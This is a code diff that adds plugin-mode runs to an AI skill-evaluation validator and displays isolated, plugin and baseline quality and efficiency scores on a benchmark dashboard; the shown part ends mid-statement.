diff --git a/eng/dashboard/dashboard.js b/eng/dashboard/dashboard.js
index b8f5e58265..b0e731d302 100644
--- a/eng/dashboard/dashboard.js
+++ b/eng/dashboard/dashboard.js
@@ -160,14 +160,16 @@
if (qualityEntries.length > 0) {
// Use only the most recent entries for summary cards
const recentEntries = qualityEntries.slice(-SUMMARY_WINDOW);
- let skilledTotal = 0, skilledCount = 0, vanillaTotal = 0, vanillaCount = 0;
+ let skilledTotal = 0, skilledCount = 0, pluginTotal = 0, pluginCount = 0, vanillaTotal = 0, vanillaCount = 0;
recentEntries.forEach(entry => {
entry.benches.forEach(b => {
if (b.name.endsWith('- Skilled Quality')) { skilledTotal += b.value; skilledCount++; }
+ if (b.name.endsWith('- Plugin Quality')) { pluginTotal += b.value; pluginCount++; }
if (b.name.endsWith('- Vanilla Quality')) { vanillaTotal += b.value; vanillaCount++; }
});
});
const skilledAvg = skilledCount > 0 ? skilledTotal / skilledCount : null;
+ const pluginAvg = pluginCount > 0 ? pluginTotal / pluginCount : null;
const vanillaAvg = vanillaCount > 0 ? vanillaTotal / vanillaCount : null;
const latestModel = qualityEntries[qualityEntries.length - 1].model;
const windowLabel = qualityEntries.length > SUMMARY_WINDOW
@@ -177,22 +179,43 @@
const delta = (skilledAvg - vanillaAvg).toFixed(2);
const deltaClass = delta > 0 ? 'positive' : delta < 0 ? 'negative' : 'neutral';
const deltaSign = delta > 0 ? '+' : '';
- summaryDiv.innerHTML = `
+ let cardsHtml = `
-
Skilled Avg
+
Skilled (Isolated) Avg
${skilledAvg.toFixed(2)}
${windowLabel}
-
+ `;
+ if (pluginAvg !== null) {
+ cardsHtml += `
+
+
Skilled (Plugin) Avg
+
${pluginAvg.toFixed(2)}
+
${windowLabel}
+
`;
+ }
+ cardsHtml += `
Vanilla Avg
${vanillaAvg.toFixed(2)}
${windowLabel}
-
Delta
+
Delta (Isolated)
${deltaSign}${delta}
${delta > 0 ? 'Skills improve quality' : delta < 0 ? 'Skills degrade quality' : 'No difference'}
-
+ `;
+ if (pluginAvg !== null && vanillaAvg !== null) {
+ const pluginDelta = (pluginAvg - vanillaAvg).toFixed(2);
+ const pluginDeltaClass = pluginDelta > 0 ? 'positive' : pluginDelta < 0 ? 'negative' : 'neutral';
+ const pluginDeltaSign = pluginDelta > 0 ? '+' : '';
+ cardsHtml += `
+
+
Delta (Plugin)
+
${pluginDeltaSign}${pluginDelta}
+
${pluginDelta > 0 ? 'Plugin improves quality' : pluginDelta < 0 ? 'Plugin degrades quality' : 'No difference'}
+
`;
+ }
+ cardsHtml += `
Data Points
${qualityEntries.length}
@@ -204,6 +227,7 @@
latest run
`;
+ summaryDiv.innerHTML = cardsHtml;
}
// Count not-activated entries
@@ -267,19 +291,32 @@
if (qualityEntries.length > 0) {
// Discover tests from all entries (not just latest, which may have partial data)
const tests = new Set();
+ let hasAnyPlugin = false;
qualityEntries.forEach(entry => {
entry.benches.forEach(b => {
- const match = b.name.match(/^(.+) - (Skilled|Vanilla) Quality$/);
- if (match) tests.add(match[1]);
+ const match = b.name.match(/^(.+) - (Skilled|Plugin|Vanilla) Quality$/);
+ if (match) {
+ tests.add(match[1]);
+ if (match[2] === 'Plugin') hasAnyPlugin = true;
+ }
});
});
tests.forEach(test => {
- createPairedChart(
- qualityChartsDiv, test, qualityEntries,
- `${test} - Skilled Quality`, `${test} - Vanilla Quality`,
- 'Skilled', 'Vanilla', '#58a6ff', '#8b949e'
- );
+ if (hasAnyPlugin) {
+ createTripleChart(
+ qualityChartsDiv, test, qualityEntries,
+ `${test} - Skilled Quality`, `${test} - Plugin Quality`, `${test} - Vanilla Quality`,
+ 'Isolated', 'Plugin', 'Vanilla',
+ '#58a6ff', '#3fb950', '#8b949e'
+ );
+ } else {
+ createPairedChart(
+ qualityChartsDiv, test, qualityEntries,
+ `${test} - Skilled Quality`, `${test} - Vanilla Quality`,
+ 'Skilled', 'Vanilla', '#58a6ff', '#8b949e'
+ );
+ }
});
}
@@ -288,10 +325,13 @@
if (efficiencyEntries.length > 0) {
// Discover tests from all entries (not just latest, which may have partial data)
const effTests = new Set();
+ let hasAnyPluginEff = false;
efficiencyEntries.forEach(entry => {
entry.benches.forEach(b => {
- const match = b.name.match(/^(.+) - Skilled Time$/);
- if (match) effTests.add(match[1]);
+ const matchSkilled = b.name.match(/^(.+) - Skilled Time$/);
+ if (matchSkilled) effTests.add(matchSkilled[1]);
+ const matchPlugin = b.name.match(/^(.+) - Plugin Time$/);
+ if (matchPlugin) { effTests.add(matchPlugin[1]); hasAnyPluginEff = true; }
});
});
@@ -310,15 +350,20 @@
// Precompute per-entry data in a single pass over e.benches
const timeName = `${test} - Skilled Time`;
const tokenName = `${test} - Skilled Tokens In`;
+ const plugTimeName = `${test} - Plugin Time`;
+ const plugTokenName = `${test} - Plugin Tokens In`;
const legendFlags = { notActivated: false, timedOut: false, overfittingModerate: false, overfittingHigh: false, multiIssue: false };
const perEntryData = efficiencyEntries.map(e => {
let timeBench = undefined;
let tokenBench = undefined;
+ let plugTimeBench = undefined;
+ let plugTokenBench = undefined;
for (const b of e.benches) {
if (!timeBench && b.name === timeName) timeBench = b;
else if (!tokenBench && b.name === tokenName) tokenBench = b;
- if (timeBench && tokenBench) break;
+ else if (!plugTimeBench && b.name === plugTimeName) plugTimeBench = b;
+ else if (!plugTokenBench && b.name === plugTokenName) plugTokenBench = b;
}
const timeNA = !!(timeBench && timeBench.notActivated);
const tokenNA = !!(tokenBench && tokenBench.notActivated);
@@ -344,11 +389,15 @@
tokenNotActivated: tokenNA,
tokenTimedOut: tokenTO,
tokenOverfitting: tokenOF,
+ plugTimeValue: plugTimeBench ? plugTimeBench.value : null,
+ plugTokenValue: plugTokenBench ? plugTokenBench.value / 1000 : null,
};
});
const timeData = perEntryData.map(d => d.timeValue);
const tokenData = perEntryData.map(d => d.tokenValue);
+ const plugTimeData = perEntryData.map(d => d.plugTimeValue);
+ const plugTokenData = perEntryData.map(d => d.plugTokenValue);
// Per-point styling using shared helper
const timeAp = perEntryData.map(d => getPointAppearance({ timedOut: d.timeTimedOut, notActivated: d.timeNotActivated, overfitting: d.timeOverfitting }, '#f0883e'));
@@ -362,41 +411,70 @@
const tokenPointRadius = tokenAp.map(a => a.radius);
const tokenPointBorderWidth = tokenAp.map(a => a.borderWidth);
+ const datasets = [
+ {
+ label: 'Isolated Time (s)',
+ data: timeData,
+ borderColor: '#f0883e',
+ borderWidth: 2,
+ pointBackgroundColor: timePointBg,
+ pointBorderColor: timePointBg,
+ pointRadius: timePointRadius,
+ pointBorderWidth: timePointBorderWidth,
+ pointStyle: timePointStyle,
+ tension: 0.3,
+ fill: false,
+ yAxisID: 'y'
+ },
+ {
+ label: 'Isolated Tokens (k)',
+ data: tokenData,
+ borderColor: '#a371f7',
+ borderWidth: 2,
+ pointBackgroundColor: tokenPointBg,
+ pointBorderColor: tokenPointBg,
+ pointRadius: tokenPointRadius,
+ pointBorderWidth: tokenPointBorderWidth,
+ pointStyle: tokenPointStyle,
+ tension: 0.3,
+ borderDash: [5, 5],
+ fill: false,
+ yAxisID: 'y1'
+ }
+ ];
+
+ // Add plugin efficiency datasets if any plugin data exists
+ if (hasAnyPluginEff) {
+ datasets.push({
+ label: 'Plugin Time (s)',
+ data: plugTimeData,
+ borderColor: '#3fb950',
+ borderWidth: 2,
+ pointRadius: 4,
+ pointHoverRadius: 6,
+ tension: 0.3,
+ fill: false,
+ yAxisID: 'y'
+ });
+ datasets.push({
+ label: 'Plugin Tokens (k)',
+ data: plugTokenData,
+ borderColor: '#56d364',
+ borderWidth: 2,
+ pointRadius: 4,
+ pointHoverRadius: 6,
+ tension: 0.3,
+ borderDash: [5, 5],
+ fill: false,
+ yAxisID: 'y1'
+ });
+ }
+
new Chart(canvas, {
type: 'line',
data: {
labels,
- datasets: [
- {
- label: 'Time (s)',
- data: timeData,
- borderColor: '#f0883e',
- borderWidth: 2,
- pointBackgroundColor: timePointBg,
- pointBorderColor: timePointBg,
- pointRadius: timePointRadius,
- pointBorderWidth: timePointBorderWidth,
- pointStyle: timePointStyle,
- tension: 0.3,
- fill: false,
- yAxisID: 'y'
- },
- {
- label: 'Tokens In (k)',
- data: tokenData,
- borderColor: '#a371f7',
- borderWidth: 2,
- pointBackgroundColor: tokenPointBg,
- pointBorderColor: tokenPointBg,
- pointRadius: tokenPointRadius,
- pointBorderWidth: tokenPointBorderWidth,
- pointStyle: tokenPointStyle,
- tension: 0.3,
- borderDash: [5, 5],
- fill: false,
- yAxisID: 'y1'
- }
- ]
+ datasets
},
options: {
responsive: true,
@@ -445,6 +523,157 @@
}
}
+ // Helper: create a triple line chart (baseline, isolated, plugin)
+ function createTripleChart(container, title, entries, nameA, nameB, nameC, labelA, labelB, labelC, colorA, colorB, colorC) {
+ const div = document.createElement('div');
+ div.className = 'chart-container';
+ div.innerHTML = `${title}
`;
+ container.appendChild(div);
+ const canvas = div.querySelector('canvas');
+
+ const labels = entries.map(e => {
+ const d = new Date(e.date);
+ return d.toLocaleDateString('en-US', { month: 'short', day: 'numeric', hour: '2-digit', minute: '2-digit' });
+ });
+
+ // Precompute per-entry data in a single pass
+ const legendFlags = { notActivated: false, timedOut: false, overfittingModerate: false, overfittingHigh: false, multiIssue: false };
+ const perEntryData = entries.map(e => {
+ let benchA = undefined, benchB = undefined, benchC = undefined;
+ for (const b of e.benches) {
+ if (!benchA && b.name === nameA) benchA = b;
+ else if (!benchB && b.name === nameB) benchB = b;
+ else if (!benchC && b.name === nameC) benchC = b;
+ if (benchA && benchB && benchC) break;
+ }
+ const aNotActivated = !!(benchA && benchA.notActivated);
+ const aTimedOut = !!(benchA && benchA.timedOut);
+ const aOverfitting = benchA && benchA.overfitting ? benchA.overfitting : null;
+ const bNotActivated = !!(benchB && benchB.notActivated);
+ const bTimedOut = !!(benchB && benchB.timedOut);
+ const bOverfitting = benchB && benchB.overfitting ? benchB.overfitting : null;
+ if (aNotActivated || bNotActivated) legendFlags.notActivated = true;
+ if (aTimedOut || bTimedOut) legendFlags.timedOut = true;
+ if (aOverfitting || bOverfitting) {
+ if (aOverfitting === 'high' || bOverfitting === 'high') legendFlags.overfittingHigh = true;
+ else legendFlags.overfittingModerate = true;
+ }
+ const aIssues = (aNotActivated ? 1 : 0) + (aTimedOut ? 1 : 0) + (aOverfitting ? 1 : 0);
+ const bIssues = (bNotActivated ? 1 : 0) + (bTimedOut ? 1 : 0) + (bOverfitting ? 1 : 0);
+ if (aIssues > 1 || bIssues > 1) legendFlags.multiIssue = true;
+ return {
+ valueA: benchA ? benchA.value : null,
+ valueB: benchB ? benchB.value : null,
+ valueC: benchC ? benchC.value : null,
+ aNotActivated, aTimedOut, aOverfitting,
+ bNotActivated, bTimedOut, bOverfitting,
+ };
+ });
+
+ const dataA = perEntryData.map(d => d.valueA);
+ const dataB = perEntryData.map(d => d.valueB);
+ const dataC = perEntryData.map(d => d.valueC);
+
+ // Per-point styling for dataset A (Isolated) and B (Plugin)
+ const pointApA = perEntryData.map(d => getPointAppearance({ timedOut: d.aTimedOut, notActivated: d.aNotActivated, overfitting: d.aOverfitting }, colorA));
+ const pointBgA = pointApA.map(a => a.color);
+ const pointBorderA = pointApA.map(a => a.color);
+ const pointRadiusA = pointApA.map(a => a.radius);
+ const pointStyleA = pointApA.map(a => a.style);
+ const pointBorderWidthA = pointApA.map(a => a.borderWidth);
+ const pointApB = perEntryData.map(d => getPointAppearance({ timedOut: d.bTimedOut, notActivated: d.bNotActivated, overfitting: d.bOverfitting }, colorB));
+ const pointBgB = pointApB.map(a => a.color);
+ const pointBorderB = pointApB.map(a => a.color);
+ const pointRadiusB = pointApB.map(a => a.radius);
+ const pointStyleB = pointApB.map(a => a.style);
+ const pointBorderWidthB = pointApB.map(a => a.borderWidth);
+
+ new Chart(canvas, {
+ type: 'line',
+ data: {
+ labels,
+ datasets: [
+ {
+ label: labelA,
+ data: dataA,
+ borderColor: colorA,
+ backgroundColor: colorA + '20',
+ borderWidth: 2,
+ pointBackgroundColor: pointBgA,
+ pointBorderColor: pointBorderA,
+ pointRadius: pointRadiusA,
+ pointBorderWidth: pointBorderWidthA,
+ pointStyle: pointStyleA,
+ pointHoverRadius: 8,
+ tension: 0.3,
+ fill: false
+ },
+ {
+ label: labelB,
+ data: dataB,
+ borderColor: colorB,
+ backgroundColor: colorB + '20',
+ borderWidth: 2,
+ pointBackgroundColor: pointBgB,
+ pointBorderColor: pointBorderB,
+ pointRadius: pointRadiusB,
+ pointBorderWidth: pointBorderWidthB,
+ pointStyle: pointStyleB,
+ pointHoverRadius: 8,
+ tension: 0.3,
+ fill: false
+ },
+ {
+ label: labelC,
+ data: dataC,
+ borderColor: colorC,
+ backgroundColor: colorC + '20',
+ borderWidth: 2,
+ pointRadius: 4,
+ pointHoverRadius: 6,
+ tension: 0.3,
+ borderDash: [5, 5],
+ fill: false
+ }
+ ]
+ },
+ options: {
+ responsive: true,
+ interaction: { mode: 'index', intersect: false },
+ plugins: {
+ legend: { labels: { color: '#8b949e', font: { size: 11 }, usePointStyle: true } },
+ tooltip: {
+ callbacks: {
+ afterTitle: (items) => {
+ const idx = items[0].dataIndex;
+ const entry = entries[idx];
+ const parts = [];
+ if (entry && entry.model) parts.push(`Model: ${entry.model}`);
+ if (entry && entry.commit) {
+ const msg = entry.commit.message.split('\n')[0];
+ parts.push(msg.length > 60 ? msg.substring(0, 60) + '...' : msg);
+ }
+ parts.push(...buildIssueTooltipLines(entry, b => b.name === nameA || b.name === nameB || b.name === nameC));
+ return parts.join('\n');
+ }
+ }
+ }
+ },
+ scales: {
+ x: { ticks: { color: '#8b949e' }, grid: { color: '#30363d' } },
+ y: {
+ ticks: { color: '#8b949e' },
+ grid: { color: '#30363d' },
+ suggestedMin: 0,
+ suggestedMax: 10
+ }
+ }
+ }
+ });
+
+ appendLegendNotes(div, legendFlags);
+ }
+
// Helper: create a paired line chart
function createPairedChart(container, title, entries, nameA, nameB, labelA, labelB, colorA, colorB) {
const div = document.createElement('div');
diff --git a/eng/dashboard/generate-benchmark-data.ps1 b/eng/dashboard/generate-benchmark-data.ps1
index c227467e8f..16e9d564e5 100644
--- a/eng/dashboard/generate-benchmark-data.ps1
+++ b/eng/dashboard/generate-benchmark-data.ps1
@@ -128,15 +128,15 @@ foreach ($verdict in $results.verdicts) {
# roll-up across all scenarios and must NOT be used here — each datapoint
# should reflect only its own scenario's activation result).
$notActivated = $false
- if ($scenario.skillActivation -and -not $scenario.skillActivation.activated) {
- # Only flag as not-activated if activation was expected (expect_activation defaults to true)
- $expectActivation = $true
- if ($scenario.PSObject.Properties['expectActivation'] -and $scenario.expectActivation -eq $false) {
- $expectActivation = $false
- }
- if ($expectActivation) {
- $notActivated = $true
- }
+ # Determine whether activation is expected (defaults to true)
+ $expectActivation = $true
+ if ($scenario.PSObject.Properties['expectActivation'] -and $scenario.expectActivation -eq $false) {
+ $expectActivation = $false
+ }
+ # Support both old (skillActivation) and new (skillActivationIsolated) JSON schemas
+ $sa = if ($scenario.PSObject.Properties['skillActivationIsolated']) { $scenario.skillActivationIsolated } else { $scenario.skillActivation }
+ if ($sa -and -not $sa.activated -and $expectActivation) {
+ $notActivated = $true
}
# Check per-scenario timeout state
@@ -184,12 +184,18 @@ foreach ($verdict in $results.verdicts) {
}
}
+ # Support both old (withSkill) and new (skilledIsolated) JSON schemas
+ $skilled = if ($scenario.PSObject.Properties['skilledIsolated']) { $scenario.skilledIsolated } else { $scenario.withSkill }
+
+ # Plugin run (may not exist for older results or utility methods)
+ $plugin = if ($scenario.PSObject.Properties['skilledPlugin']) { $scenario.skilledPlugin } else { $null }
+
# Quality scores (from judge results, scale 0-5 mapped to 0-10 for dashboard)
- if ($null -ne $scenario.withSkill.judgeResult.overallScore) {
+ if ($null -ne $skilled.judgeResult.overallScore) {
$benchEntry = @{
name = "$testName - Skilled Quality"
unit = "Score (0-10)"
- value = [float]$scenario.withSkill.judgeResult.overallScore * 2
+ value = [float]$skilled.judgeResult.overallScore * 2
}
if ($notActivated) {
$benchEntry.notActivated = $true
@@ -203,6 +209,26 @@ foreach ($verdict in $results.verdicts) {
}
$qualityBenches.Add($benchEntry)
}
+ if ($null -ne $plugin -and $null -ne $plugin.judgeResult.overallScore) {
+ $pluginBenchEntry = @{
+ name = "$testName - Plugin Quality"
+ unit = "Score (0-10)"
+ value = [float]$plugin.judgeResult.overallScore * 2
+ }
+ # Plugin activation check
+ $saPlugin = if ($scenario.PSObject.Properties['skillActivationPlugin']) { $scenario.skillActivationPlugin } else { $null }
+ if ($saPlugin -and -not $saPlugin.activated -and $expectActivation) {
+ $pluginBenchEntry.notActivated = $true
+ }
+ if ($scenarioTimedOut) {
+ $pluginBenchEntry.timedOut = $true
+ }
+ if ($overfittingSeverity) {
+ $pluginBenchEntry.overfitting = $overfittingSeverity
+ $pluginBenchEntry.overfittingScore = $overfittingScore
+ }
+ $qualityBenches.Add($pluginBenchEntry)
+ }
if ($null -ne $scenario.baseline.judgeResult.overallScore) {
$qualityBenches.Add(@{
name = "$testName - Vanilla Quality"
@@ -211,12 +237,12 @@ foreach ($verdict in $results.verdicts) {
})
}
- # Efficiency metrics (from with-skill run)
- if ($null -ne $scenario.withSkill.metrics.wallTimeMs) {
+ # Efficiency metrics (from with-skill isolated run)
+ if ($null -ne $skilled.metrics.wallTimeMs) {
$effBenchEntry = @{
name = "$testName - Skilled Time"
unit = "seconds"
- value = [math]::Round([float]$scenario.withSkill.metrics.wallTimeMs / 1000, 1)
+ value = [math]::Round([float]$skilled.metrics.wallTimeMs / 1000, 1)
}
if ($notActivated) {
$effBenchEntry.notActivated = $true
@@ -230,11 +256,11 @@ foreach ($verdict in $results.verdicts) {
}
$efficiencyBenches.Add($effBenchEntry)
}
- if ($null -ne $scenario.withSkill.metrics.tokenEstimate) {
+ if ($null -ne $skilled.metrics.tokenEstimate) {
$tokenBenchEntry = @{
name = "$testName - Skilled Tokens In"
unit = "tokens"
- value = [float]$scenario.withSkill.metrics.tokenEstimate
+ value = [float]$skilled.metrics.tokenEstimate
}
if ($notActivated) {
$tokenBenchEntry.notActivated = $true
@@ -248,6 +274,50 @@ foreach ($verdict in $results.verdicts) {
}
$efficiencyBenches.Add($tokenBenchEntry)
}
+
+ # Efficiency metrics (from plugin run, if exists)
+ # Compute plugin-specific notActivated signal for efficiency benches
+ $pluginNotActivated = $false
+ $saPlugin = if ($scenario.PSObject.Properties['skillActivationPlugin']) { $scenario.skillActivationPlugin } else { $null }
+ if ($saPlugin -and -not $saPlugin.activated -and $expectActivation) {
+ $pluginNotActivated = $true
+ }
+ if ($null -ne $plugin -and $null -ne $plugin.metrics.wallTimeMs) {
+ $pluginTimeBench = @{
+ name = "$testName - Plugin Time"
+ unit = "seconds"
+ value = [math]::Round([float]$plugin.metrics.wallTimeMs / 1000, 1)
+ }
+ if ($pluginNotActivated) {
+ $pluginTimeBench.notActivated = $true
+ }
+ if ($scenarioTimedOut) {
+ $pluginTimeBench.timedOut = $true
+ }
+ if ($overfittingSeverity) {
+ $pluginTimeBench.overfitting = $overfittingSeverity
+ $pluginTimeBench.overfittingScore = $overfittingScore
+ }
+ $efficiencyBenches.Add($pluginTimeBench)
+ }
+ if ($null -ne $plugin -and $null -ne $plugin.metrics.tokenEstimate) {
+ $pluginTokenBench = @{
+ name = "$testName - Plugin Tokens In"
+ unit = "tokens"
+ value = [float]$plugin.metrics.tokenEstimate
+ }
+ if ($pluginNotActivated) {
+ $pluginTokenBench.notActivated = $true
+ }
+ if ($scenarioTimedOut) {
+ $pluginTokenBench.timedOut = $true
+ }
+ if ($overfittingSeverity) {
+ $pluginTokenBench.overfitting = $overfittingSeverity
+ $pluginTokenBench.overfittingScore = $overfittingScore
+ }
+ $efficiencyBenches.Add($pluginTokenBench)
+ }
}
}
diff --git a/eng/skill-validator/src/Commands/ValidateCommand.cs b/eng/skill-validator/src/Commands/ValidateCommand.cs
index 7220b3805d..2e18b23a7b 100644
--- a/eng/skill-validator/src/Commands/ValidateCommand.cs
+++ b/eng/skill-validator/src/Commands/ValidateCommand.cs
@@ -188,6 +188,22 @@ public static async Task Run(ValidatorConfig config)
Console.WriteLine($"Noise test enabled: discovered {noiseSkills.Count} noise skill(s) from {config.NoiseSkillsDir}");
}
+ // Group skills by their plugin — standalone skills are errors
+ var (_, pluginErrors) = SkillDiscovery.GroupSkillsByPlugin(allSkills);
+ foreach (var error in pluginErrors)
+ Console.Error.WriteLine($"\x1b[31m❌ {error}\x1b[0m");
+ if (pluginErrors.Count > 0)
+ {
+ if (allSkills.Count == pluginErrors.Count)
+ {
+ Console.Error.WriteLine("\x1b[31mAll skills are standalone (no valid plugin.json found) — nothing to evaluate.\x1b[0m");
+ return 1;
+ }
+ // Filter out standalone skills — they would silently run without a
+ // real plugin context, producing misleading "plugin" results.
+ allSkills = allSkills.Where(s => SkillDiscovery.FindPluginRoot(s.Path) is not null).ToList();
+ }
+
// Check per-plugin aggregate description size
var aggregateFailures = CheckAggregateDescriptionLimits(allSkills);
if (aggregateFailures.Count > 0)
@@ -310,7 +326,7 @@ await Reporter.ReportResults(verdicts, config.Reporters, config.Verbose,
Console.Error.WriteLine();
}
- await AgentRunner.StopSharedClient();
+ await AgentRunner.StopAllClients();
await AgentRunner.CleanupWorkDirs();
// Always fail on execution errors, even in --verdict-warn-only mode
@@ -489,11 +505,10 @@ internal static List CheckAggregateDescriptionLimits(IReadOnlyList c.SkillActivation is { Activated: false }).ToList();
- // Separate unexpected non-activations (expect_activation defaulting to true)
- // from expected ones (negative tests with expect_activation: false).
- var unexpectedNotActivated = notActivated.Where(c => c.ExpectActivation).ToList();
- var expectedNotActivated = notActivated.Where(c => !c.ExpectActivation).ToList();
+ var notActivatedIsolated = comparisons.Where(c => c.SkillActivationIsolated is { Activated: false } && c.ExpectActivation).ToList();
+ var notActivatedPlugin = comparisons.Where(c => c.SkillActivationPlugin is { Activated: false } && c.ExpectActivation).ToList();
+ var expectedNotActivated = comparisons.Where(c =>
+ (c.SkillActivationIsolated is { Activated: false } || c.SkillActivationPlugin is { Activated: false }) && !c.ExpectActivation).ToList();
if (expectedNotActivated.Count > 0)
{
@@ -501,14 +516,23 @@ internal static List CheckAggregateDescriptionLimits(IReadOnlyList 0)
+ if (notActivatedIsolated.Count > 0)
{
- var names = string.Join(", ", unexpectedNotActivated.Select(c => c.ScenarioName));
- log($"\x1b[33m\u26a0\ufe0f Skill was NOT activated in scenario(s): {names}\x1b[0m");
+ var names = string.Join(", ", notActivatedIsolated.Select(c => c.ScenarioName));
+ log($"\x1b[33m⚠️ Skill NOT activated (isolated) in: {names}\x1b[0m");
verdict.SkillNotActivated = true;
verdict.Passed = false;
verdict.FailureKind = "skill_not_activated";
- verdict.Reason += $" [SKILL NOT ACTIVATED in {unexpectedNotActivated.Count} scenario(s): {names}]";
+ verdict.Reason += $" [NOT ACTIVATED (isolated) in {notActivatedIsolated.Count} scenario(s)]";
+ }
+ if (notActivatedPlugin.Count > 0)
+ {
+ var names = string.Join(", ", notActivatedPlugin.Select(c => c.ScenarioName));
+ log($"\x1b[33m⚠️ Skill NOT activated (plugin) in: {names}\x1b[0m");
+ verdict.SkillNotActivated = true;
+ verdict.Passed = false;
+ verdict.FailureKind = "skill_not_activated";
+ verdict.Reason += $" [NOT ACTIVATED (plugin) in {notActivatedPlugin.Count} scenario(s)]";
}
var timedOutScenarios = comparisons.Where(c => c.TimedOut).ToList();
@@ -544,34 +568,97 @@ private static async Task ExecuteScenario(
scenarioLog($"✓ All {config.Runs} run(s) complete");
var baselineRuns = runResults.Select(r => r.Baseline).ToList();
- var withSkillRuns = runResults.Select(r => r.WithSkill).ToList();
+ var isolatedRuns = runResults.Select(r => r.SkilledIsolated).ToList();
+ var pluginRuns = runResults.Select(r => r.SkilledPlugin).ToList();
var perRunPairwise = runResults.Select(r => r.Pairwise).ToList();
- var perRunScores = new List();
+ // Per-run improvement scores — effective score is min(isolated, plugin)
+ // Pairwise result is generated against the worse-scoring run (isolated
+ // or plugin). Apply it only to that matching comparison so it does not
+ // skew the other one.
+ var perRunIsolatedScores = new List();
+ var perRunPluginScores = new List();
for (int i = 0; i < baselineRuns.Count; i++)
{
- var runComparison = Comparator.CompareScenario(scenario.Name, baselineRuns[i], withSkillRuns[i], perRunPairwise[i]);
- perRunScores.Add(runComparison.ImprovementScore);
+ var pw = perRunPairwise[i];
+ bool pairwiseFromPlugin = runResults[i].PairwiseFromPlugin;
+ var isoComp = Comparator.CompareScenario(scenario.Name, baselineRuns[i], isolatedRuns[i],
+ pairwiseFromPlugin ? null : pw);
+ var plgComp = Comparator.CompareScenario(scenario.Name, baselineRuns[i], pluginRuns[i],
+ pairwiseFromPlugin ? pw : null);
+ perRunIsolatedScores.Add(isoComp.ImprovementScore);
+ perRunPluginScores.Add(plgComp.ImprovementScore);
}
- var avgBaseline = AverageResults(baselineRuns);
- var avgWithSkill = AverageResults(withSkillRuns);
- var bestPairwise = perRunPairwise.FirstOrDefault(pw => pw?.PositionSwapConsistent == true)
- ?? perRunPairwise.FirstOrDefault();
+ var perRunScores = perRunIsolatedScores
+ .Zip(perRunPluginScores, (iso, plg) => Math.Min(iso, plg))
+ .ToList();
- var comparison = Comparator.CompareScenario(scenario.Name, avgBaseline, avgWithSkill, bestPairwise);
+ var avgBaseline = AverageResults(baselineRuns);
+ var avgIsolated = AverageResults(isolatedRuns);
+ var avgPlugin = AverageResults(pluginRuns);
+ // Select the best pairwise result and track which run it came from
+ int bestPairwiseIdx = -1;
+ for (int i = 0; i < perRunPairwise.Count; i++)
+ {
+ if (perRunPairwise[i]?.PositionSwapConsistent == true) { bestPairwiseIdx = i; break; }
+ }
+ if (bestPairwiseIdx < 0)
+ {
+ for (int i = 0; i < perRunPairwise.Count; i++)
+ {
+ if (perRunPairwise[i] is not null) { bestPairwiseIdx = i; break; }
+ }
+ }
+ var bestPairwise = bestPairwiseIdx >= 0 ? perRunPairwise[bestPairwiseIdx] : null;
+
+ // Two comparisons — apply pairwise only to the matching one,
+ // using the source run's flag (not any-run) to avoid misattribution.
+ bool aggPairwiseFromPlugin = bestPairwiseIdx >= 0 && runResults[bestPairwiseIdx].PairwiseFromPlugin;
+ var isoComparison = Comparator.CompareScenario(scenario.Name, avgBaseline, avgIsolated,
+ aggPairwiseFromPlugin ? null : bestPairwise);
+ var plgComparison = Comparator.CompareScenario(scenario.Name, avgBaseline, avgPlugin,
+ aggPairwiseFromPlugin ? bestPairwise : null);
+
+ // Build the combined ScenarioComparison
+ var comparison = new ScenarioComparison
+ {
+ ScenarioName = scenario.Name,
+ Baseline = avgBaseline,
+ SkilledIsolated = avgIsolated,
+ SkilledPlugin = avgPlugin,
+ ImprovementScore = Math.Min(isoComparison.ImprovementScore, plgComparison.ImprovementScore),
+ IsolatedImprovementScore = isoComparison.ImprovementScore,
+ PluginImprovementScore = plgComparison.ImprovementScore,
+ Breakdown = isoComparison.ImprovementScore <= plgComparison.ImprovementScore
+ ? isoComparison.Breakdown : plgComparison.Breakdown,
+ IsolatedBreakdown = isoComparison.Breakdown,
+ PluginBreakdown = plgComparison.Breakdown,
+ PairwiseResult = bestPairwise,
+ };
comparison.PerRunScores = perRunScores;
- // Aggregate skill activation info
- var allActivations = runResults.Select(r => r.SkillActivation).ToList();
- comparison.SkillActivation = new SkillActivationInfo(
- Activated: allActivations.Any(a => a.Activated),
- DetectedSkills: allActivations.SelectMany(a => a.DetectedSkills).Distinct().ToList(),
- ExtraTools: allActivations.SelectMany(a => a.ExtraTools).Distinct().ToList(),
- SkillEventCount: allActivations.Sum(a => a.SkillEventCount));
+ // Aggregate skill activation — BOTH skilled runs independently
+ var allIsoActivations = runResults.Select(r => r.SkillActivationIsolated).ToList();
+ var allPlgActivations = runResults.Select(r => r.SkillActivationPlugin).ToList();
+
+ comparison.SkillActivationIsolated = new SkillActivationInfo(
+ Activated: allIsoActivations.Any(a => a.Activated),
+ DetectedSkills: allIsoActivations.SelectMany(a => a.DetectedSkills).Distinct().ToList(),
+ ExtraTools: allIsoActivations.SelectMany(a => a.ExtraTools).Distinct().ToList(),
+ SkillEventCount: allIsoActivations.Sum(a => a.SkillEventCount));
+
+ comparison.SkillActivationPlugin = new SkillActivationInfo(
+ Activated: allPlgActivations.Any(a => a.Activated),
+ DetectedSkills: allPlgActivations.SelectMany(a => a.DetectedSkills).Distinct().ToList(),
+ ExtraTools: allPlgActivations.SelectMany(a => a.ExtraTools).Distinct().ToList(),
+ SkillEventCount: allPlgActivations.Sum(a => a.SkillEventCount));
// Propagate timeout info from any run
- comparison.TimedOut = runResults.Any(r => r.WithSkill.Metrics.TimedOut || r.Baseline.Metrics.TimedOut);
+ comparison.TimedOut = runResults.Any(r =>
+ r.Baseline.Metrics.TimedOut ||
+ r.SkilledIsolated.Metrics.TimedOut ||
+ r.SkilledPlugin.Metrics.TimedOut);
// Propagate expect_activation from scenario config
comparison.ExpectActivation = scenario.ExpectActivation;
@@ -581,9 +668,12 @@ private static async Task ExecuteScenario(
private sealed record RunExecutionResult(
RunResult Baseline,
- RunResult WithSkill,
+ RunResult SkilledIsolated,
+ RunResult SkilledPlugin,
PairwiseJudgeResult? Pairwise,
- SkillActivationInfo SkillActivation);
+ bool PairwiseFromPlugin,
+ SkillActivationInfo SkillActivationIsolated,
+ SkillActivationInfo SkillActivationPlugin);
private static async Task ExecuteRun(
int runIndex,
@@ -602,81 +692,83 @@ private static async Task ExecuteRun(
if (config.Verbose)
runLog("running agents...");
+ var pluginRoot = SkillDiscovery.FindPluginRoot(skill.Path);
+
var agentTasks = await Task.WhenAll(
- AgentRunner.RunAgent(new RunOptions(scenario, null, skill.EvalPath, config.Model, config.Verbose, runLog)),
